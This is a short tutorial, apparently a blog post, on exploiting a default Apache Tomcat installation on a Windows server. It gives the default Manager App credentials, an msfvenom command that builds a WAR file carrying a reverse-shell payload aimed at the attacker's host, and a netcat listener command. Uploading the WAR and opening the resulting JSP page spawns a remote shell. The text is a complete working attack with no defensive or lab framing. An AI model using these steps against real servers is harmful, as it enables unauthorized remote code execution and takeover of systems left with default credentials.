How to exploit Apache Tomcat default install
A default Apache Tomcat installation, allows you to upload a War file and spawn a reverse shell in the server.
This Demo will be for a windows server.
Getting into the “Manager App”, it will ask you for a User/Password which is tomcat/s3cret by default.
we should first generate the War file by running:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f war > rev.war
this should generate a rev.war file which we will upload to the manager page.
After a successful upload, a JSP page will be created and the reverse shell is ready to go.
all we need to do is to set up our TCP Netcat listener using:
- nc -nlvp PORT
and then navigate to the new JSP page. a shell will be spawned back to you.